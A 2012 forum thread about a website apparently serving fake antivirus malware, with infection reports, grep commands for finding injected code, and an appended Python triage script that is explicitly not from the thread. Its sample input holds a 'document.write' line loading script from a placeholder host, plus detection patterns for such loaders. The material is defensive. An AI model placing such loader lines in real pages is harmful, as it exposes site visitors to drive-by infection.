
Suspicious Inline Obfuscated script

Started by XHIBIT911, June 26, 2012, 02:52:11 PM


XHIBIT911

I did a scan of my website and this line of code was listed as suspicious... what the hell is this about?

!window.jQuery && document.write(unescape('%3Cscript src="http://code.jquery.com/jquery.min.js"%3E%...

Sir Osis of Liver

     She is happy where she lies
     With the dust upon her eyes.

Storman™

Quote: I did a scan of my website....

How? What method do you mean? Looks iffy though..... :(

Storman™

Quote: How? What method do you mean? Looks iffy though.....

Oops, don't worry, I just checked pshomesource and my Avast went into mayhem mode.

Yep looks like you have an issue...  :(

XHIBIT911


--------- LINK SCAN SUMMARY ---------
URL scanned: http://www.pshomesource.com
PhisTank say's: This site is safe.
AVG say's: Service not available.
SiteTruth say's: This site is safe.
Google Safe Browsing say's: This site is safe.
Threat Name: No Threat FOUND
Threat Definitions: 1260009
Engine Version: 0.97.5
Host IP:
Link Status: Clean
File Size: 50.55 KB
Time Finished: 8.05 secs
Overall result: This site is secure.

XHIBIT911

Scan Report
MyWOT   26-06-2012, 12:01:21   CLEAN   More Details
Netcraft   26-06-2012, 12:01:21   CLEAN   More Details
urlQuery   26-06-2012, 12:01:21   CLEAN   More Details
DrWeb   26-06-2012, 12:01:21   CLEAN   More Details
AMaDa   17-03-2012, 06:48:58   CLEAN   More Details
MalwareDomainList   26-06-2012, 12:00:34   CLEAN   More Details
malc0de   26-06-2012, 12:00:35   CLEAN   More Details
ZeuS Tracker   26-06-2012, 12:00:47   CLEAN   More Details
SpyEye Tracker   26-06-2012, 12:00:52   CLEAN   More Details
EXPOSURE   26-06-2012, 12:01:00   CLEAN   More Details
Malware Patrol    26-06-2012, 12:01:15   CLEAN   More Details
PhishTank   26-06-2012, 12:01:18   CLEAN   More Details
DNS-BH   26-06-2012, 12:01:20   CLEAN   More Details
JoeWein   26-06-2012, 12:00:10   CLEAN   More Details
BitDefender   26-06-2012, 12:01:21   CLEAN   More Details
VScan   26-06-2012, 12:01:21   CLEAN   More Details
Avira   26-06-2012, 12:01:21   CLEAN   More Details
SCUMWARE   26-06-2012, 12:01:21   CLEAN   More Details
URIBL   26-06-2012, 12:01:21   CLEAN   More Details
MalwareBlacklist   26-06-2012, 12:01:21   CLEAN   More Details
hpHosts   26-06-2012, 12:01:21   CLEAN   More Details
BrowserDefender   26-06-2012, 12:01:21   CLEAN   More Details
TrendMicro   26-06-2012, 12:01:21   CLEAN   More Details
GoogleSafeBrowsing   26-06-2012, 12:01:21   CLEAN   More Details
SpamhausDBL   26-06-2012, 12:01:21   CLEAN   More Details
SURBL   26-06-2012, 12:01:21   CLEAN   More Details
WebSecurityGuard   26-06-2012, 12:01:21   CLEAN   More Details
AVGThreatLabs   26-06-2012, 12:01:21   CLEAN   More Details
URLVir   26-06-2012, 12:01:21   CLEAN   More Details
ThreatLog   26-06-2012, 12:01:21   CLEAN   More Details
K7Antivirus   26-06-2012, 05:45:10   CLEAN   More Details

XHIBIT911

Avast and AVG are either giving false positives or that script is malicious, because I have 100 members who never had the issue, and every now and then someone messages me and says different.

After testing my site on various website checkers, which all listed my site as being clean:

https://www.virustotal.com/#url

http://online.us.drweb.com/?url=1

http://onlinelinkscan.com/

http://www.urlvoid.com/scan/pshomesource.com/

http://jsunpack.jeek.org/dec/go?report=1a41bdf10d6d8a5cdafeb700c1e9af67c6f46a97

I get suspicious readings from here: http://www.unmaskparasites.com/security-report/#report

and from Avira's site, as potential threats.


XHIBIT911

Where do I find that code, and is it safe to remove... because I have had people (very, very few) say that it set their security suites off.

Fustrate

It's just a normal way to include jQuery (a javascript library). Nothing to worry about, since it's sourcing the script straight from jQuery's site.
Steven Hoffman
Former Team Member, 2009-2012

XHIBIT911

OK, well, how can I find and remove whatever exploit people's security suites are claiming my site has?

Storman™

Well having gone to your site I can report that I've "caught" something.

Not your fault, this stuff happens, but I would take your links out of your sig till you get it sorted out.

Having great fun at the moment lol, popup heaven. Think I'm going to be busy for a while.... :-\


EDIT: Actually this is not fun, just lost restore points and boot loader fudged. Rebuilt boot loader but this is a mean little bugger. I can see a full re-install on the cards here  >:(

Fustrate

Quote from: XHIBIT911 on June 26, 2012, 03:36:01 PM
OK, well, how can I find and remove whatever exploit people's security suites are claiming my site has?

Well, it's certainly not that line that you posted. I don't see anything blatantly suspicious when I load the site, but that doesn't mean there's nothing there.
Steven Hoffman
Former Team Member, 2009-2012

Storman™

Well, I just acquired some mean little barstool from the site, so wouldn't advise going there unless it's sorted now?

Fustrate

It could be something that only shows up once in a while or on specific systems. Instead of an online scan, can you do a scan from the server itself? Or, if you're on a shared host, can they do a scan?
Steven Hoffman
Former Team Member, 2009-2012

busterone

I got the fake antivirus "security scan" on my system when I checked out your site about 20 minutes ago. It blew right past Nod32. Luckily, I have a copy of rkill and killed the process before any damage was done. It placed itself in \Local Settings\Application Data\oppflgxxez.exe

My computer is clean now, but there is something wrong on your site, whether infected ads or base code, I can't say.

XHIBIT911

It's got to be in some code somewhere, because I don't do ads. Those are just image link banners that I uploaded myself, and it was doing this before they were on site.... I need to find the code and get it the hell out, but don't have a clue how to find it or where to even look.

Storman™

Quote: It placed itself in \Local Settings\Application Data\oppflgxxez.exe

Well, I'm up and running again after re-imaging. Had what busterone had, but it went one step further before I could intervene. Also had a file in Application Data but with a different name:

\Local Settings\Application Data\bgjaipqfa.exe

Remind me to run sandboxed next time, doh..  :-[

Quote: I need to find the code and get it the hell out but don't have a clue how to find it or where to even look

XHIBIT911 - Have you got root access to your server? If so, do you know how to use an SSH client like PuTTY?

SSH into server as root, if not already there change directory to root folder:

cd /

then run grep to find a particular string in the server files:

grep -R yourstring *

You'll need to replace the text "yourstring" with something that we are searching for. I would have thought it unlikely that "document.write(unescape" is used anywhere legitimate, so you could try that as a starter unless you have more code to go on. The parentheses have to be quoted so the shell doesn't try to interpret them, so you'll need to run:

grep -R 'document.write(unescape' *

If grep -R fails to work then try:

find / -type f -exec grep -l 'document.write(unescape' {} \;

Obviously you can try searching for different code, depends what you have to go on.

Please bear in mind that searching like that can put a strain on the CPU, depends what set-up you're on. Just something to remember in case it falls over, but the least of your worries in this situation. ;)

Fustrate

Again, that particular line is not the problem. As I said before, it is used legitimately to load jQuery if it hasn't already been loaded.

You're leading XHIBIT911 on a wild goose chase. He should really be doing a scan with actual security software, not grepping for a string that has nothing to do with the malware.

I'll repeat: do a scan on the system itself or ask your host to.
Steven Hoffman
Former Team Member, 2009-2012

Storman™

Quote: You're leading XHIBIT911 on a wild goose chase

It was the only line posted and I did say it depends on what other code he already has and to adjust accordingly.

I disagree, though, that the line is definitely not the problem. "document.write(unescape" is used in malware all the time, so to discount it outright is not good practice until proved otherwise. It makes perfect sense to load jQuery externally for something like this. As we have no idea what other code or mods are running on the site, you can't simply say it's legitimate; it's a dangerous assumption without further information being available to us.

Doing the above is just one of a number of avenues he should be looking at, including, as you quite rightly say, a security scan, but again they could well turn up nothing depending on the nature of the cause.
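The disagreement above (is a `document.write(unescape(...))` write the benign jQuery fallback, or an injected loader?) can be settled by decoding the payload rather than grepping for the string alone. The following is an added triage script, not code from the thread or from SMF: it finds each such write in a JavaScript/HTML file, percent-decodes the payload, and checks which host any `<script src>` inside it points at. The allowlist `TRUSTED_SCRIPT_HOSTS`, the helper names and the sample input are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote, urlparse

# Hosts a jQuery fallback loader is expected to fetch from. Assumption: a small
# allowlist the site owner maintains; code.jquery.com is the host in the thread.
TRUSTED_SCRIPT_HOSTS = {"code.jquery.com", "ajax.googleapis.com"}

# document.write(unescape('...')) or with double quotes; non-greedy payload.
DOCWRITE_RE = re.compile(r"document\.write\(\s*unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
# src attribute of any <script> tag inside the decoded payload.
SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)

def classify_payload(decoded):
    """Decide what a decoded document.write payload actually loads."""
    srcs = SRC_RE.findall(decoded)
    if not srcs:
        return "suspicious-inline"          # writes code directly, no external file
    hosts = {urlparse(s).hostname for s in srcs}
    if None in hosts:
        return "local-review"               # relative path: inspect that file too
    if hosts <= TRUSTED_SCRIPT_HOSTS:
        return "benign-cdn"                 # the jQuery fallback case from the thread
    return "suspicious-host"                # loads script from an unexpected host

def triage_document_write(js_text):
    """Return (decoded_payload, verdict) for every unescape() write in js_text."""
    return [(unquote(m.group(2)), classify_payload(unquote(m.group(2))))
            for m in DOCWRITE_RE.finditer(js_text)]

# Constructed sample: the benign jQuery fallback plus two injected-looking writes
# (bad.example is a reserved placeholder host, not a real indicator).
SAMPLE_JS = (
    "!window.jQuery && document.write(unescape('%3Cscript src=\"http://code.jquery.com/"
    "jquery.min.js\"%3E%3C/script%3E'));\n"
    "document.write(unescape('%3Cscript src=\"http://bad.example/x.js\"%3E%3C/script%3E'));\n"
    "document.write(unescape('%3Cscript%3Evar z=1;%3C/script%3E'));\n"
)

if __name__ == "__main__":
    for decoded, verdict in triage_document_write(SAMPLE_JS):
        print(verdict, "<-", decoded)
```

Run it over the output of the grep above (or over the site's template files directly); only writes that resolve to an unexpected host, a relative file, or inline code need a human look.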
